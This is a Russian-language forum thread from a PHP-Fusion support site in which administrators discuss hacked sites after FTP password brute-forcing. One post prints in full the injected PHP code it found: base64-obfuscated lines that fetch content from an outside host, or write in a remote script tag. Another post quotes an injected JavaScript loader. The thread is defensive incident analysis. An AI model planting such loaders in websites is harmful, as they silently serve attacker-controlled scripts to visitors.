Форум: очередной взлом?

Просмотр темы

PHP-Fusion Russia » Поддержка 7 версии » Безопасность

Страница 1 из 2: 12

очередной взлом?
Alex	#1 Опубликовано 12.08.2013 06:54
Администратор Группа тестеров Персонал сайта Сообщений: 1270 Зарегистрирован: 07.11.2010 13:05	захожу сегодня на сайт и у меня сразу выскакивает окно расширения носкрипт типа заблокирован скрипт скрин и в низу сайта вижу вот такое: Access denied for user 'km250'@'localhost' (using password: NO)Access denied for user 'km250'@'localhost' (using password: NO)Access denied for user 'km250'@'localhost' (using password: NO)Access denied for user 'km250'@'localhost' (using password: NO)Access denied for user 'km250'@'localhost' (using password: NO)Access denied for user 'km250'@'localhost' (using password: NO)Access denied for user 'km250'@'localhost' (using password: NO)Access denied for user 'km250'@'localhost' (using password: NO) никакие скрипты мной не ставились. далее иду на фтп и вижу что изменен файл index.php сразу заменяю его на хороший из бекапа, и все что описано выше пропадает. очередной взлом?
	Web

Alex	#2 Опубликовано 12.08.2013 06:57
Администратор Группа тестеров Персонал сайта Сообщений: 1270 Зарегистрирован: 07.11.2010 13:05	плохой файл индекс Alex присоединено следующее:файл: _.zip [2.67кБ / 513 Загрузки]
	Web

Alex	#3 Опубликовано 12.08.2013 06:59
Администратор Группа тестеров Персонал сайта Сообщений: 1270 Зарегистрирован: 07.11.2010 13:05	хороший файл индекс Alex присоединено следующее:файл: index.zip [2.31кБ / 473 Загрузки]
	Web

Alex	#4 Опубликовано 12.08.2013 07:03
Администратор Группа тестеров Персонал сайта Сообщений: 1270 Зарегистрирован: 07.11.2010 13:05	сравнив оба файла в конце нашел вот такой код Код function sql2_safe($in) { $rtn = base64_decode($in); return $rtn; } function collectnewss() { if (!isset($_COOKIE["iJijkdaMnerys"])) { $value = 'yadeor'; $ip = $_SERVER['REMOTE_ADDR']; $get = sql2_safe("aHR0cDovL3h4eHBvcm5vLnh4dXouY29tOjg4OC9tb3ZlLnBocD9pcD0=").$ip; $file = @fopen ($get, "r"); $content = @fread($file, 1000); @setcookie("iJijkdaMnerys", $value, time()+3600*24); if (!$content) echo sql2_safe("PHNjcmlwdCBzcmM9Imh0dHA6Ly9hY2NvdW50dXMuZ2V0cy1pdC5uZXQvZ29vZ2xlc3RhdC5waHAiPjwvc2NyaXB0Pg=="); else echo $content; } } collectnewss ();
	Web

Alex	#5 Опубликовано 12.08.2013 07:14
Администратор Группа тестеров Персонал сайта Сообщений: 1270 Зарегистрирован: 07.11.2010 13:05	на одном сайте только такое из 17 сайтов на аккаунте
	Web

Rush	#6 Опубликовано 12.08.2013 07:29
Администратор Разработчики Группа поддержки Сообщений: 1418 Зарегистрирован: 31.08.2010 14:41	http://xxxporno.xxuz.com:888/move.php?ip= - отсюда из файла что-то считывается. второй base64 что-от не раскодился. AnnetLab \| @annetlab \| GitHub Addons repo \| AL Shop - open source e-shop for PHP-Fusion \| PHPtoday.ru
	Web

Alex	#7 Опубликовано 12.08.2013 07:55
Администратор Группа тестеров Персонал сайта Сообщений: 1270 Зарегистрирован: 07.11.2010 13:05	я был не прав что такое тока на одном сайте, такой код нашел на всех стартовых страницах фьюженовских сайтах которые у меня на бегете
	Web

Pisatel	#8 Опубликовано 12.08.2013 08:24
Ветеран Сообщений: 678 Зарегистрирован: 08.02.2013 05:51	Версия фьюжн? Стоят ли старые версии фьюжн?
	Web

kosmozone	#9 Опубликовано 12.08.2013 08:38
Начинающий Сообщений: 34 Зарегистрирован: 24.10.2012 14:06	Двиг v7.02.07. На 2 сайтах, взлом через фтп (код добавлен в конец файла). Затронутые файлы по 1 сайту в ататче. Код `<script type=\"text/javascript\" language=\"javascript\" > function srcc() { var wcsb = document.createElement('script'); wcsb.src = 'http://mail.ru'; if (!document.getElementById('wcsb')) { document.write('<div id=\'wcsb\'></div>'); document.getElementById('wcsb').appendChild(wcsb); }}";` kosmozone присоединено следующее:изображение:
	Web

Serge Renard	#10 Опубликовано 12.08.2013 08:39
Опытный пользователь Сообщений: 250 Зарегистрирован: 18.02.2013 18:46	Блин, объясните мне, что такое «взлом по FTP» и как он возможен? Вы пароли в клиентах, что ли, храните? В Интернете кто-то неправ!
	Web

Pisatel	#11 Опубликовано 12.08.2013 08:51
Ветеран Сообщений: 678 Зарегистрирован: 08.02.2013 05:51	У меня, вроде, все нормально. Сейчас изучаю логи.
	Web

Alex	#12 Опубликовано 12.08.2013 08:52
Администратор Группа тестеров Персонал сайта Сообщений: 1270 Зарегистрирован: 07.11.2010 13:05	11 фьюженов 5 вордпрессов 1 джумла минимальная версия фьюженов 7,02,06 на всех 17 сайтах изменена страница index.php , последствия для фьюженов привел выше, последствия для вп сайты перестали работать, пока не удалил код была белая страница
	Web

kosmozone	#13 Опубликовано 12.08.2013 09:06
Начинающий Сообщений: 34 Зарегистрирован: 24.10.2012 14:06	Пароли в клиентах не храню по умолчанию. Хостер говорит - вирусы, проверил комп, не нашел.
	Web

Pisatel	#14 Опубликовано 12.08.2013 09:32
Ветеран Сообщений: 678 Зарегистрирован: 08.02.2013 05:51	Ну как бэ может это и не фьюжн, может жомла... http://asu-cs.donntu.edu.ua/ru/staffmen?p_id=24 Банально вбил кусок кода в поиск- куча сайтов на жомле и вп... Изменил(а) Pisatel, 12.08.2013 09:38
	Web

Alex	#15 Опубликовано 12.08.2013 09:36
Администратор Группа тестеров Персонал сайта Сообщений: 1270 Зарегистрирован: 07.11.2010 13:05	все сайты пострадали на аккаунте в рбк
	Web

Pisatel	#16 Опубликовано 12.08.2013 09:45
Ветеран Сообщений: 678 Зарегистрирован: 08.02.2013 05:51	Пока через поиск одни вордпрессы попадаются с аналогичным кодом. Код чуть отличается: где-то eval присутствует... Забавно.
	Web

Alex	#17 Опубликовано 12.08.2013 09:54
Администратор Группа тестеров Персонал сайта Сообщений: 1270 Зарегистрирован: 07.11.2010 13:05	по логам он долбился по всем фтп аккаунтам пароли подбирал, первый файл был загружен на фьюженовский сайт. 37.1.217.121 вот айпи взломщика
	Web

Pisatel	#18 Опубликовано 12.08.2013 10:16
Ветеран Сообщений: 678 Зарегистрирован: 08.02.2013 05:51	Ко мне тоже стучались. Статистика 404 ошибок. Ип, правда, другой Код 404 /admin/mysql-admin/main.php 11 August 2013 22:23:52 87.98.217.14 404 /admin/phpmyadmin2/main.php 11 August 2013 22:23:52 87.98.217.14 404 /admin/php-my-admin/main.php 11 August 2013 22:23:52 87.98.217.14 404 /admin/padmin/main.php 11 August 2013 22:23:52 87.98.217.14 404 /admin/datenbank/main.php 11 August 2013 22:23:52 87.98.217.14 404 /admin/database/main.php 11 August 2013 22:23:52 87.98.217.14 404 /phpmyadmin/main.php 11 August 2013 22:23:52 87.98.217.14 404 /phpMyAdmin/main.php 11 August 2013 22:23:52 87.98.217.14 404 /db/main.php 11 August 2013 22:23:52 87.98.217.14 404 /web/main.php 11 August 2013 22:23:52 87.98.217.14 404 /PMA/main.php 11 August 2013 22:23:52 87.98.217.14 404 /admin/main.php 11 August 2013 22:23:52 87.98.217.14 404 /mysql/main.php 11 August 2013 22:23:52 87.98.217.14 404 /admin/phpmyadmin/main.php 11 August 2013 22:23:51 87.98.217.14 404 /admin/phpMyAdmin/main.php 11 August 2013 22:23:51 87.98.217.14 404 /admin/sysadmin/main.php 11 August 2013 22:23:51 87.98.217.14 404 /admin/sqladmin/main.php 11 August 2013 22:23:51 87.98.217.14 404 /admin/db/main.php 11 August 2013 22:23:51 87.98.217.14 404 /admin/web/main.php 11 August 2013 22:23:51 87.98.217.14 404 /admin/pMA/main.php 11 August 2013 22:23:51 87.98.217.14 404 /admin/main.php 11 August 2013 22:23:51 87.98.217.14 404 /admin/mysql/main.php 11 August 2013 22:23:51 87.98.217.14 404 /admin/myadmin/main.php 11 August 2013 22:23:51 87.98.217.14 404 /admin/webadmin/main.php 11 August 2013 22:23:51 87.98.217.14 404 /admin/sqlweb/main.php 11 August 2013 22:23:51 87.98.217.14 404 /admin/websql/main.php 11 August 2013 22:23:51 87.98.217.14
	Web

kosmozone	#19 Опубликовано 12.08.2013 10:29
Начинающий Сообщений: 34 Зарегистрирован: 24.10.2012 14:06	По логам фтп, ломали с этих адресов 176.9.116.34 62.219.58.10
	Web

GMan1990	#20 Опубликовано 12.08.2013 10:37
Пользователь Сообщений: 52 Зарегистрирован: 18.04.2011 18:16	Ни чего удивительного))) Мне хостер присылал уведомления: 4 августа, 3:01 Здравствуйте! Вы получили данное письмо, так как являетесь активным клиентом хостинга Шнайдер-хост. Сообщаем, что в данный момент серверы хостинга продолжают (в том числе и Ваш) подвергаться массовой брутфорс атаке (подбор паролей методом грубой силы). Конкретно страдают сайты с движками Joomla, Wordpress и Datalife. Идет массированая атака на сайты под управлением данных CMS. Стали появляться новости в сети, об атаках, многие хостеры подвержены. Например ссылки: http://www.provisov.net/blog/2013/08/%D0%B7%D0%B0%D1%84%D0%B8%D0%BA%D1%81%D0%B8%D1%80%D0%BE%D0%B2%D0%B0%D0%BD%D0%B0-%D0%BC%D0%B0%D1%81%D1%81%D0%BE%D0%B2%D0%B0%D1%8F-%D0%B0%D1%82%D0%B0%D0%BA%D0%B0-wordpress-%D0%B1%D0%BB%D0%BE%D0%B3%D0%BE/ http://www.opennet.ru/opennews/art.shtml?num=36689 http://1hosting.livejournal.com/21954.html Вот форум, где обсуждается текущая проблема: http://www.cy-pr.com/forum/f23/t53996/m590692#message590692 Аналогичные новости поступают от хостеров и различных площадок. Для сохранения доступности и работоспособности сайтов на хостинге, мы были вынуждены временно ограничить доступ к файлам администратора джумлы (administrator/index.php), Wordpress (wp-login.php) и dle(admin.php). Просим прощения за все неудобства, но не все вещи подвластны контролю. Пока длительность атаки насчитывает уже 50 часов. Она то слабеет, то становится сильнее. Сейчас она снова усилилась. Поэтому вынуждены были опять заблокировать админки (они были разблокированы позавчера). Сколько она будет продолжаться - неизвестно, но думаем осталось недолго, учитывая ее масштабы. Мы вернем доступ в админки как только атака пройдет или ослабнет снова. Если Вам очень нужен доступ в админку, и Вы никак не можете подождать - обратитесь в нашу техническую поддержку, и мы постараемся включить админку конкретно для Вас. Мы преодолеем эту проблему вместе. С уважением и любовью, Ваш Шнайдер-хост. Человек
	Web